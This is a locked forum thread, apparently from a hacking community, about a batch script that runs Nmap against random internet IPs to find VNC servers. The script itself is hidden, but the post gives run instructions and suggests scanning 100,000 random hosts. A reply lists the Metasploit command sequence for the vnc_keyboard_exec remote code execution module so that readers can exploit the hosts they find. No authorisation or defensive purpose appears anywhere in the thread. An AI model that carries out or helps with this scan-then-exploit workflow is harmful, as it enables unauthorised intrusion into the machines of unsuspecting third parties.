Jump to content
YOUR-AD-HERE
HOSTING
TOOLS

Locked [BATCH] VNC Scanner


Need4Weed

Recommended Posts

BATCH Vnc Scanner - Nmap

 

Hi guys in the light of a new exploit

VNC Keyboard Remote Code Execution

 

I wanted to share a simple BATCH script i use to scan random ips for vnc. It uses Nmap and stores all results in results.txt next to the .BAT fiile

 

This is the hidden content, please

 

1. Copy the above code to notepad

 

2. Save as VNCscan.BAT

 

3. Make sure you have Nmap installed

 

Change the number 1000 after -iR to how many random ips you would like to scan e.g 100000, That wil Scan one hundred thousand IPs and wriye the results into results.txt

 

You may have to ammend file path to you computer

Link to comment
Share on other sites

Re: [bATCH] VNC Scanner

 

For the guys that are not in the know how....

 

Exploit is available via Metasploit!

 

Module Name:

 

exploit/multi/vnc/vnc_keyboard_exec

 

 

msf > use exploit/multi/vnc/vnc_keyboard_exec

msf exploit(vnc_keyboard_exec) > show targets

...targets...

msf exploit(vnc_keyboard_exec) > set TARGET

msf exploit(vnc_keyboard_exec) > show options

...show and set options...

msf exploit(vnc_keyboard_exec) > exploit

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.